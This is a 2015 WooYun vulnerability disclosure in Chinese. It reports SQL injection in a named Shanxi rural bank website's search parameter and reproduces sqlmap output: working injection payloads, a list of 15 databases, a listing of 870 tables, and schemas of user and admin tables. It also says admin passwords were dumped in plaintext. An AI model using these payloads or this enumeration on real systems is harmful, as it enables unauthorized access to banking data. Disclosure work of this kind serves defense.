当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143214

漏洞标题:山西某农商行官网SQL注入导致15库上千表敏感信息泄露(一)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-09-25 11:34

修复时间:2015-11-14 09:04

公开时间:2015-11-14 09:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-25: 细节已通知厂商并且等待厂商处理中
2015-09-30: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-10: 细节向核心白帽子及相关领域专家公开
2015-10-20: 细节向普通白帽子公开
2015-10-30: 细节向实习白帽子公开
2015-11-14: 细节向公众公开

简要描述:

多wooyun,多机会...

详细说明:

泽州农商行主站(http://www.zrcbank.top)存在SQL注入,导致15个数据库,1000多表敏感信息泄露...

漏洞证明:

泽州农商行主站地址:http://www.zrcbank.top

1主页面.png


SQL注入页面:http://www.zrcbank.top/group/1search.php
在输入框中输入aaa’后,点击查询,系统提示SQL警告

输入aaa报错了.png


怀疑此处stext参数可能存在注入

报错了.png


用工具来测试下,果然存在注入:

sqlmap identified the following injection points with a total of 83 HTTP(s) requests:
---
Place: GET
Parameter: stext
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: stext=-5119' OR (9907=9907)#
Type: UNION query
Title: MySQL UNION query (NULL) - 14 columns
Payload: stext=aaa' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7166757271,0x6745674350634e746f47,0x716f687071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: stext=aaa' AND 2871=BENCHMARK(5000000,MD5(0x564b7354)) AND 'TSje'='TSje
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0


一共包含15个数据库:

web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL 5
available databases [15]:
[*] apermin0320
[*] biweb
[*] cms1
[*] dedecmsv57gbksp1
[*] freecken
[*] hiked
[*] information_schema
[*] lanhuah
[*] mysql
[*] sjyrw
[*] test
[*] w7ims
[*] wechat
[*] zrcbank
[*] zrcmall


当前数据库为:apermin0320

web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL 5
current database: 'apermin0320'


apermin0320数据库包含870表(信息量不小啊!)

web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL 5
Database: apermin0320
[870 tables]
+--------------------------------------+
| update |
| user |
| accessbank |
| accessprepay |
| accesspreshou |
| accesstype |
| affair |
| bank |
| bankzhuru |
| buyplanmain |
| buyplanmain_detail |
| buyplanmain_detail_color |
| buyplanmain_mingxi |
| buyplanmain_tmp_color |
| buyplanstate |
| calendar |
| calendar_type |
| callchuli |
| callertype |
| calltype |
| certificate |
| certificatetype |
| commlog |
| competeproduct |
| contact |
| contract_flag |
| crm_chance |
| crm_chance_rate |
| crm_contact |
| crm_customer_move |
| crm_dict_servicesources |
| crm_dict_servicestatus |
| crm_dict_servicetypes |
| crm_feiyong_sq |
| crm_finishstate |
| crm_jieduan |
| crm_mytable |
| crm_mytable_notes |
| crm_mytable_wz |
| crm_mytable_xssx |
| crm_piaoju_type |
| crm_remember |
| crm_service |
| crm_shenhezhuangtai |
| crm_shenqingbaobei |
| crm_zhuangtai |
| customer |
| customer_fangan |
| customer_xuqiu |
| customerarea |
| customerbelong |
| customerdefinetype |
| customerlever |
| customerorigin |
| customerproduct |
| customerproduct_detail |
| customs_ranking_list |
| department |
| dict_countrycode |
| dict_danyuanyongtu |
| dict_danyuanzhuangtai |
| dict_education |
| dict_huxing |
| dict_notify |
| dict_satisfaction |
| dict_shiyongleixing |
| dict_weekday |
| dict_xingbie |
| dict_xingzheng_qingjia |
| dict_zhengjianleixing |
| dorm_area |
| dorm_building |
| ecs_account_log |
| ecs_ad |
| ecs_ad_custom |
| ecs_ad_position |
| ecs_admin_action |
| ecs_admin_log |
| ecs_admin_message |
| ecs_admin_user |
| ecs_adsense |
| ecs_affiliate_log |
| ecs_agency |
| ecs_area_region |
| ecs_article |
| ecs_article_cat |
| ecs_attribute |
| ecs_auction_log |
| ecs_auto_manage |
| ecs_back_goods |
| ecs_back_order |
| ecs_bonus_type |
| ecs_booking_goods |
| ecs_brand |
| ecs_card |
| ecs_cart |
| ecs_cart_combo |
| ecs_cat_recommend |
| ecs_category |
| ecs_collect_goods |
| ecs_comment |
| ecs_commission |
| ecs_crons |
| ecs_delivery_goods |
| ecs_delivery_order |
| ecs_email_list |
| ecs_email_sendlist |
| ecs_error_log |
| ecs_exchange_goods |
| ecs_favourable_activity |
| ecs_feedback |
| ecs_friend_link |
| ecs_goods |
| ecs_goods_activity |
| ecs_goods_article |
| ecs_goods_attr |
| ecs_goods_cat |
| ecs_goods_gallery |
| ecs_goods_type |
| ecs_group_goods |
| ecs_keywords |
| ecs_link_goods |
| ecs_mail_templates |
| ecs_member_price |
| ecs_nav |
| ecs_order_action |
| ecs_order_goods |
| ecs_order_info |
| ecs_pack |
| ecs_package_goods |
| ecs_pay_log |
| ecs_payment |
| ecs_plugins |
| ecs_products |
| ecs_reg_extend_info |
| ecs_reg_fields |
| ecs_region |
| ecs_role |
| ecs_searchengine |
| ecs_seller_category |
| ecs_seller_extend_info |
| ecs_seller_fields |
| ecs_seller_nav |
| ecs_seller_shopbg |
| ecs_seller_shopheader |
| ecs_seller_shopinfo |
| ecs_seller_shopslide |
| ecs_seller_shopwindow |
| ecs_sessions |
| ecs_sessions_data |
| ecs_shipping |
| ecs_shipping_area |
| ecs_shop_config |
| ecs_snatch_log |
| ecs_stats |
| ecs_store_category |
| ecs_street_tags |
| ecs_suppliers |
| ecs_tag |
| ecs_template |
| ecs_topic |
| ecs_touch_activity |
| ecs_touch_ad |
| ecs_touch_ad_position |
| ecs_touch_article |
| ecs_touch_article_cat |
| ecs_touch_auth |
| ecs_touch_brand |
| ecs_touch_category |
| ecs_touch_feedback |
| ecs_touch_goods |
| ecs_touch_goods_activity |
| ecs_touch_nav |
| ecs_touch_payment |
| ecs_touch_shop_config |
| ecs_touch_user_info |
| ecs_user_account |
| ecs_user_address |
| ecs_user_bonus |
| ecs_user_feed |
| ecs_user_rank |
| ecs_user_seller |
| ecs_users |
| ecs_virtual_card |
| ecs_volume_price |
| ecs_vote |
| ecs_vote_log |
| ecs_vote_option |
| ecs_wechat |
| ecs_wechat_custom_message |
| ecs_wechat_extend |
| ecs_wechat_mass_history |
| ecs_wechat_media |
| ecs_wechat_menu |
| ecs_wechat_point |
| ecs_wechat_prize |
| ecs_wechat_qrcode |
| ecs_wechat_reply |
| ecs_wechat_rule_keywords |
| ecs_wechat_user |
| ecs_wechat_user_group |
| ecs_weixin_bonus |
| ecs_weixin_cfg |
| ecs_weixin_config |
| ecs_weixin_keywords |
| ecs_weixin_lang |
| ecs_weixin_menu |
| ecs_weixin_point |
| ecs_weixin_point_record |
| ecs_weixin_user |
| ecs_wholesale |
| email |
| emailstate |
| exchange |
| fahuodan |
| fahuodan_detail |
| fahuostate |
| fahuotype |
| feiyongclass |
| feiyongrecord |
| feiyongtype |
| fixedasset |
| fixedassetbaofei |
| fixedassetgroup |
| fixedassetin |
| fixedassetleibie |
| fixedassetout |
| fixedassetstatus |
| fixedassettiaoku |
| fixedassettui |
| fixedassetweixiu |
| fukuanplan |
| fukuanrecord |
| gb_marriage |
| gb_national |
| gb_political |
| gb_sex |
| hk_cityclass |
| hk_deal |
| hk_deal_item |
| hk_deal_log |
| hk_delivery |
| hk_delivery_notice |
| hk_goods |
| hk_goodsclass |
| hk_hoteluser |
| hk_mobilecode |
| hk_payment |
| hk_payment_form |
| hk_payment_notice |
| hk_region |
| hk_search_user |
| hk_user |
| hk_useraddress |
| hk_work |
| hkfood_admin |
| hkfood_cityclass |
| hkfood_deal |
| hkfood_deal_item |
| hkfood_deal_short_copy |
| hkfood_goods |
| hkfood_shop |
| hkfood_shopadmin |
| hrms_boolean |
| hrms_educationalexperience |
| hrms_expense |
| hrms_expense_type |
| hrms_file |
| hrms_file_fuzhi |
| hrms_file_lizhi |
| hrms_file_luyong |
| hrms_laboringskill |
| hrms_r_p |
| hrms_r_p_name |
| hrms_r_p_status |
| hrms_reward_punishment |
| hrms_socialrelation |
| hrms_transfer |
| hrms_transfer_type |
| hrms_work_status |
| hrms_worker_hetong |
| hrms_worker_zhengzhao |
| hrms_worker_zhicheng |
| hrms_workexperience |
| hrms_zhiwei_status |
| hrms_zpjihua |
| hrms_zprencaiku |
| huikuanplan |
| huikuanrecord |
| ifneed |
| important |
| ims_activity |
| ims_activity_day |
| ims_activity_guest |
| ims_activity_mail |
| ims_activity_note |
| ims_activity_reply |
| ims_activity_user |
| ims_article |
| ims_article_category |
| ims_article_reply |
| ims_attachment |
| ims_award |
| ims_award_list |
| ims_baoming_list |
| ims_baoming_reply |
| ims_basic_reply |
| ims_bigpan_award |
| ims_bigpan_reply |
| ims_bigpan_winner |
| ims_bigwheel_award |
| ims_bigwheel_fans |
| ims_bigwheel_reply |
| ims_bless_card |
| ims_bless_reply |
| ims_business |
| ims_cache |
| ims_card |
| ims_card_coupon |
| ims_card_log |
| ims_card_members |
| ims_card_members_coupon |
| ims_card_password |
| ims_chengji |
| ims_community_admap |
| ims_community_advertisement |
| ims_community_announcement |
| ims_community_express_company |
| ims_community_express_fee |
| ims_community_express_order |
| ims_community_manager |
| ims_community_member |
| ims_community_phone |
| ims_community_region |
| ims_community_reply |
| ims_community_report |
| ims_community_service |
| ims_community_servicecategory |
| ims_community_verifycode |
| ims_cover_reply |
| ims_credit_log |
| ims_credit_request |
| ims_cyd_award |
| ims_cyd_reply |
| ims_cyd_winner |
| ims_default_reply_log |
| ims_dqq_award |
| ims_dqq_reply |
| ims_dqq_winner |
| ims_duanwu_dianzan |
| ims_duanwu_fans |
| ims_duanwu_show |
| ims_egg_award |
| ims_egg_reply |
| ims_egg_winner |
| ims_exam_choice |
| ims_exam_desc |
| ims_exam_paper |
| ims_fans |
| ims_fans_2 |
| ims_fuli |
| ims_fuli_reply |
| ims_fuli_rows |
| ims_game |
| ims_game2048_reply |
| ims_game_category |
| ims_game_img |
| ims_groupon_fans |
| ims_groupon_list |
| ims_groupon_order |
| ims_groupon_set |
| ims_hlzonyu_data |
| ims_hlzonyu_list |
| ims_hlzonyu_log |
| ims_hlzonyu_order |
| ims_hlzonyu_reply |
| ims_hotel2 |
| ims_hotel2_brand |
| ims_hotel2_business |
| ims_hotel2_member |
| ims_hotel2_order |
| ims_hotel2_reply |
| ims_hotel2_room |
| ims_hotel2_room_price |
| ims_hotel2_set |
| ims_hotel_order |
| ims_hotel_reply |
| ims_hotel_shop |
| ims_huabao |
| ims_huabao_item |
| ims_huabao_photo |
| ims_huabao_reply |
| ims_icard2_announce |
| ims_icard2_business |
| ims_icard2_card |
| ims_icard2_card_log |
| ims_icard2_coupon |
| ims_icard2_gift |
| ims_icard2_level |
| ims_icard2_money_log |
| ims_icard2_order |
| ims_icard2_outlet |
| ims_icard2_privilege |
| ims_icard2_reply |
| ims_icard2_score |
| ims_icard2_sign |
| ims_icard2_sncode |
| ims_icard2_style |
| ims_icard2_user |
| ims_icard_announce |
| ims_icard_business |
| ims_icard_card |
| ims_icard_card_log |
| ims_icard_coupon |
| ims_icard_gift |
| ims_icard_level |
| ims_icard_money_log |
| ims_icard_order |
| ims_icard_outlet |
| ims_icard_privilege |
| ims_icard_reply |
| ims_icard_score |
| ims_icard_sign |
| ims_icard_sncode |
| ims_icard_style |
| ims_icard_user |
| ims_idish_area |
| ims_idish_cart |
| ims_idish_category |
| ims_idish_email_setting |
| ims_idish_goods |
| ims_idish_intelligent |
| ims_idish_nave |
| ims_idish_order |
| ims_idish_order_goods |
| ims_idish_print_setting |
| ims_idish_reply |
| ims_idish_setting |
| ims_idish_sms_setting |
| ims_idish_store_setting |
| ims_idish_stores |
| ims_ifans_groupsend |
| ims_ishopping_address |
| ims_ishopping_cart |
| ims_ishopping_category |
| ims_ishopping_goods |
| ims_ishopping_order |
| ims_ishopping_order_goods |
| ims_ishopping_setting |
| ims_izc_lightbox_app |
| ims_izc_lightbox_book |
| ims_izc_lightbox_comment |
| ims_izc_lightbox_list |
| ims_izc_lightbox_manage |
| ims_izc_lightbox_page |
| ims_izc_lightbox_reply |
| ims_izclightbox_items |
| ims_izclightbox_list |
| ims_izclightbox_reply |
| ims_jdg_pub |
| ims_jdg_pub_chatcomments |
| ims_jdg_pub_chatfans |
| ims_jdg_pub_clock |
| ims_jdg_pub_party |
| ims_jdg_pub_partycomments |
| ims_jdg_pub_partyfans |
| ims_jdg_pub_photos |
| ims_jdg_pub_photoslikeit |
| ims_jdg_pub_rule |
| ims_jdg_pub_wineadmin |
| ims_jdg_pub_winelog |
| ims_lxy_bigpan_award |
| ims_lxy_bigpan_reply |
| ims_lxy_bigpan_winner |
| ims_lxy_bussiness_card |
| ims_lxy_bussiness_card_class |
| ims_lxy_bussiness_card_cop |
| ims_lxy_bussiness_card_reply |
| ims_lxy_bussiness_per_card |
| ims_lxy_bussiness_per_card_class |
| ims_lxy_bussiness_per_card_cop |
| ims_lxy_bussiness_per_card_product |
| ims_lxy_bussiness_per_card_reply |
| ims_lxy_ecowzp |
| ims_lxy_ecowzp_list_add |
| ims_lxy_ecowzp_order |
| ims_lxy_ecowzp_reply |
| ims_lxy_marry_info |
| ims_lxy_marry_list |
| ims_lxy_marry_reply |
| ims_lxy_wecs |
| ims_lxy_wecs2 |
| ims_lxy_wecs3 |
| ims_mailbox_list |
| ims_mailbox_reply |
| ims_mechat |
| ims_medias |
| ims_members |
| ims_members_group |
| ims_members_paylog |
| ims_members_permission |
| ims_members_profile |
| ims_members_status |
| ims_menu_event |
| ims_message_list |
| ims_message_reply |
| ims_modules |
| ims_modules_bindings |
| ims_msg |
| ims_msg_reply |
| ims_multisearch |
| ims_multisearch_fields |
| ims_multisearch_reply |
| ims_multisearch_research |
| ims_music_reply |
| ims_news_reply |
| ims_nowbig_reply |
| ims_nowbig_user |
| ims_nuqut_reply |
| ims_oauther |
| ims_oerrorlog |
| ims_ohost |
| ims_paylog |
| ims_profile_fields |
| ims_qrcode |
| ims_qrcode_stat |
| ims_quickexam2_choice |
| ims_quickexam2_paper |
| ims_quickexam2_reply |
| ims_quickexam2_score_record |
| ims_quickmusic_music |
| ims_quickmusic_reply |
| ims_quickmusic_tape |
| ims_quicksurvay_choice |
| ims_quicksurvay_paper |
| ims_quicksurvay_reply |
| ims_quicksurvay_score_record |
| ims_redpacket |
| ims_redpacket_award |
| ims_redpacket_firend |
| ims_redpacket_reply |
| ims_redpacket_setting |
| ims_redpacket_token |
| ims_redpacket_user |
| ims_research |
| ims_research_data |
| ims_research_fields |
| ims_research_reply |
| ims_research_rows |
| ims_rule |
| ims_rule_keyword |
| ims_school |
| ims_school_class |
| ims_school_notice |
| ims_school_score |
| ims_school_set |
| ims_school_student |
| ims_school_teacher |
| ims_scratchcard_award |
| ims_scratchcard_reply |
| ims_scratchcard_winner |
| ims_security_reply |
| ims_security_winner |
| ims_sessions |
| ims_settings |
| ims_shake_member |
| ims_shake_reply |
| ims_sharecards_category |
| ims_sharecards_date |
| ims_sharecards_reply |
| ims_sheka_list |
| ims_sheka_reply |
| ims_sheka_zhufu |
| ims_shopping2_address |
| ims_shopping2_cart |
| ims_shopping2_category |
| ims_shopping2_express |
| ims_shopping2_fans |
| ims_shopping2_goods |
| ims_shopping2_order |
| ims_shopping2_order_goods |
| ims_shopping2_set |
| ims_shopping3_address |
| ims_shopping3_cart |
| ims_shopping3_category |
| ims_shopping3_express |
| ims_shopping3_fans |
| ims_shopping3_fans_like |
| ims_shopping3_genius |
| ims_shopping3_goods |
| ims_shopping3_order |
| ims_shopping3_order_goods |
| ims_shopping3_set |
| ims_shopping_address |
| ims_shopping_adv |
| ims_shopping_cart |
| ims_shopping_category |
| ims_shopping_dispatch |
| ims_shopping_express |
| ims_shopping_feedback |
| ims_shopping_goods |
| ims_shopping_goods_option |
| ims_shopping_goods_param |
| ims_shopping_order |
| ims_shopping_order_goods |
| ims_shopping_product |
| ims_shopping_set |
| ims_shopping_spec |
| ims_shopping_spec_item |
| ims_signup |
| ims_signup_data |
| ims_signup_fields |
| ims_signup_reply |
| ims_signup_rows |
| ims_site_nav |
| ims_site_slide |
| ims_site_styles |
| ims_site_templates |
| ims_smashegg_fans |
| ims_smashegg_reply |
| ims_sns |
| ims_sns_post |
| ims_sns_reply |
| ims_stat_keyword |
| ims_stat_msg_history |
| ims_stat_rule |
| ims_stonefish_chailihe_data |
| ims_stonefish_chailihe_gift |
| ims_stonefish_chailihe_reply |
| ims_stonefish_chailihe_userlist |
| ims_stonefish_grabgifts_awarding |
| ims_stonefish_grabgifts_awardingtype |
| ims_stonefish_grabgifts_data |
| ims_stonefish_grabgifts_gift |
| ims_stonefish_grabgifts_giftmika |
| ims_stonefish_grabgifts_reply |
| ims_stonefish_grabgifts_userlist |
| ims_tnhy_reply |
| ims_userapi_cache |
| ims_userapi_reply |
| ims_vote_fans |
| ims_vote_option |
| ims_vote_reply |
| ims_votes_fans |
| ims_votes_option |
| ims_votes_reply |
| ims_wcha_reply |
| ims_wechats |
| ims_wechats_modules |
| ims_weidim_item |
| ims_weidim_order |
| ims_weidim_reply |
| ims_weihaomwb_reply |
| ims_weihaomwb_user |
| ims_weishare |
| ims_weishare2 |
| ims_weishare2_firend |
| ims_weishare2_reply |
| ims_weishare2_setting |
| ims_weishare2_user |
| ims_weishare_firend |
| ims_weishare_reply |
| ims_weishare_setting |
| ims_weishare_user |
| ims_weivote_log |
| ims_weivote_option |
| ims_weivote_setting |
| ims_wish |
| ims_xcommunity_activity |
| ims_xcommunity_admap |
| ims_xcommunity_advertisement |
| ims_xcommunity_announcement |
| ims_xcommunity_carpool |
| ims_xcommunity_fled |
| ims_xcommunity_manager |
| ims_xcommunity_member |
| ims_xcommunity_navextension |
| ims_xcommunity_phone |
| ims_xcommunity_property |
| ims_xcommunity_region |
| ims_xcommunity_reply |
| ims_xcommunity_report |
| ims_xcommunity_res |
| ims_xcommunity_search |
| ims_xcommunity_service |
| ims_xcommunity_servicecategory |
| ims_xcommunity_set |
| ims_xcommunity_slide |
| ims_xcommunity_verifycode |
| ims_xhw_picvote |
| ims_xhw_picvote_log |
| ims_xhw_picvote_reg |
| ims_xhw_picvote_setting |
| ims_yoby_kehu |
| ims_yoby_xiangmu |
| ims_yqs_award |
| ims_yqs_reply |
| ims_yqs_winner |
| ims_yyy_reply |
| ims_yyy_winner |
| ims_yyyonline_reply |
| ims_yyyonline_winner |
| info |
| inorout |
| kaipiaorecord |
| kaipiaostate |
| linkman |
| measure |
| menu |
| message |
| modifyrecord |
| notify |
| numzero |
| office_task |
| officeguihuanstate |
| officeproduct |
| officeproductbaofei |
| officeproductcangku |
| officeproductgroup |
| officeproductin |
| officeproductleibie |
| officeproductout |
| officeproducttiaoku |
| officeproducttui |
| paystate |
| phpshe_ad |
| phpshe_admin |
| phpshe_article |
| phpshe_ask |
| phpshe_cart |
| phpshe_category |
| phpshe_class |
| phpshe_collect |
| phpshe_comment |
| phpshe_link |
| phpshe_order |
| phpshe_orderdata |
| phpshe_page |
| phpshe_payway |
| phpshe_product |
| phpshe_setting |
| phpshe_user |
| product |
| productcolor |
| producttype |
| productzuzhuang |
| productzuzhuang2_detail |
| productzuzhuang_detail |
| productzuzhuangstate |
| property |
| salemode |
| salseman_ranking_list |
| sellbilltype |
| sellcontract_jiaofu |
| sellplanmain |
| sellplanmain_detail |
| sellplanmain_detail_color |
| sellplanstate |
| shoupiaorecord |
| sms_sendlist |
| ssu_loginadmin |
| ssu_shopplay |
| ssu_shopuser |
| ssu_shopuser_copy |
| ssu_shopuser_copy1 |
| ssu_shopuser_youchu |
| ssu_shopvip |
| ssu_shopvip_youchu |
| stock |
| stockchangemain |
| stockchangemain_detail |
| stockchangestate |
| stockinmain |
| stockinmain_detail |
| stockinmain_detail_color |
| stockinmain_view |
| stockoutmain |
| stockoutmain_detail |
| stockoutmain_detail_color |
| stockoutmain_view |
| store |
| store_color |
| store_init |
| store_product |
| storeaccesstype |
| storecheck |
| storecheck_detail |
| supply |
| supplylever |
| supplylinkman |
| supplyproduct |
| sys_code |
| sys_function |
| sys_menu |
| system_log |
| system_logall |
| system_logtype |
| systemconfig |
| systemhelp |
| systemlang |
| systemprivate |
| systemprivateconfig |
| systemprivateinc |
| systemtable |
| test |
| tys_admin |
| tys_baozhuang |
| tys_car |
| tys_company |
| tys_danjiatype |
| tys_daozhan |
| tys_guige |
| tys_hetong |
| tys_hetong_detail |
| tys_pinming |
| tys_shangbiao |
| tys_shouhuo |
| tys_tielu |
| tys_xufang |
| tys_zhantai |
| tys_zhiliang |
| unit |
| unitprop |
| user_priv |
| v_accessbank |
| v_accessprepay |
| v_accesspreshou |
| v_bankzhurutype |
| v_buyplanmain_detail |
| v_feiyong_sq |
| v_feiyongbaoxiao |
| v_feiyongclass |
| v_feiyongrecord |
| v_feiyongtype |
| v_sellcontract |
| v_sellcontract_plan |
| v_sellone |
| v_sellonedetail |
| v_sellplanmain_detail |
| v_shouruclass |
| v_shoururecord |
| v_shourutype |
| v_supplyownmoney |
| v_workplanmain_detail |
| v_yingkaipiaohuizong |
| v_yingshoukuanhuizong |
| vip |
| w |
| workplanmain |
| workplanmain_detail |
| workplanshenhe |
| workplanstate |
| workreport |
| wygl_baoxiuxinxi |
| wygl_biaoxiuxiangmu |
| wygl_gongchenghetong |
| wygl_gongchengjindu |
| wygl_gongchengxinxi |
| wygl_pingjialeixing |
| wygl_weixiupingjia |
| yunfeitype |
| zhk_admin |
| zhk_city |
| zhk_content |
| zhk_content_zrc |
| zhk_ddz_cc |
| zhk_ddz_cc_copy |
| zhk_ddz_user |
| zhk_ddz_user2 |
| zhk_picture |
+--------------------------------------+


那就挑其中几个表看下:
user表:
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL 5
Database: apermin0320
Table: user
[83 columns]
+------------------+------------------+
| Column | Type |
+------------------+------------------+
| ADD_HOME | varchar(200) |
| AUTHORIZE | int(11) |
| AVATAR | varchar(20) |
| BBS_COUNTER | int(11) |
| BBS_SIGNATURE | text |
| BIND_IP | text |
| BIRTHDAY | date |
| BKGROUND | text |
| BP_NO | varchar(50) |
| BYNAME | varchar(20) |
| CALL_SOUND | char(2) |
| CANBROADCAST | int(11) |
| CONCERN_USER | text |
| DEPT_ID | int(11) |
| DEPT_ID_OTHER | text |
| DISABLED | int(11) |
| DUTY_TYPE | int(11) |
| EMAIL | varchar(50) |
| EMAIL_CAPACITY | int(11) |
| EmailAddress | varchar(100) |
| EmailPassword | varchar(100) |
| FAX_NO_DEPT | varchar(50) |
| FOLDER_CAPACITY | int(11) |
| FUNC_ID_STR | varchar(1000) |
| ICQ_NO | varchar(50) |
| IS_LUNAR | char(1) |
| KEY_SN | varchar(100) |
| LAST_PASS_TIME | datetime |
| LAST_VISIT_IP | varchar(100) |
| LAST_VISIT_TIME | datetime |
| leftmenu | varchar(50) |
| LIMIT_LOGIN | char(1) |
| MENU_EXPAND | char(2) |
| MENU_IMAGE | varchar(20) |
| MENU_TYPE | char(1) |
| MOBIL_NO | varchar(50) |
| MOBIL_NO_HIDDEN | char(1) |
| MOBILE_PS1 | varchar(50) |
| MOBILE_PS2 | varchar(50) |
| MOBILE_SP | varchar(50) |
| MSN | varchar(200) |
| MY_RSS | text |
| MY_STATUS | varchar(200) |
| MYTABLE_LEFT | varchar(200) |
| MYTABLE_RIGHT | varchar(200) |
| NICK_NAME | varchar(50) |
| NOT_LOGIN | varchar(20) |
| NOT_VIEW_TABLE | varchar(20) |
| NOT_VIEW_USER | varchar(20) |
| OICQ_NO | varchar(50) |
| ON_STATUS | char(1) |
| ONLINE | int(11) |
| PANEL | char(1) |
| PASSWORD | varchar(50) |
| PIC_ID | int(10) unsigned |
| POST_DEPT | text |
| POST_NO_HOME | varchar(50) |
| POST_PRIV | varchar(50) |
| REMARK | text |
| rightmenu | varchar(50) |
| SCORE | int(11) |
| SECURE_KEY_SN | varchar(20) |
| SEX | char(1) |
| SHORTCUT | text |
| SHOW_RSS | char(1) |
| SMS_ON | char(1) |
| SMTPServerIP | varchar(100) |
| TDER_FLAG | char(1) |
| TEL_NO_DEPT | varchar(50) |
| TEL_NO_HOME | varchar(50) |
| THEME | varchar(10) |
| UID | int(11) |
| UIN | int(10) unsigned |
| USEING_KEY | char(2) |
| USER_DEFINE | text |
| USER_ID | varchar(20) |
| USER_NAME | varchar(200) |
| USER_NO | int(11) |
| USER_PRIV | varchar(10) |
| USER_PRIV_OTHER | text |
| WEATHER_CITY | varchar(20) |
| WEBMAIL_CAPACITY | int(11) |
| WEBMAIL_NUM | int(11) |
+------------------+------------------+
网速慢数据太多,就没跑完...user表内容也很丰富啊
看一下zhk_admin表,这个表应该是管理员表

Database: apermin0320
Table: zhk_admin
[3 columns]
+----------+------------------+
| Column | Type |
+----------+------------------+
| id | int(10) unsigned |
| password | varchar(500) |
| username | varchar(500) |
+----------+------------------+


dump下,后台管理员用户名密码都在这了,并且还是明文,醉了...

4.png


最后在看一个表:tys_admin(我又醉了,全是弱密码)

7.png


好吧,问题证明到此。

修复方案:

该!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-30 09:02

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给山西分中心,由其后续协调网站管理单位处置.

最新状态:

暂无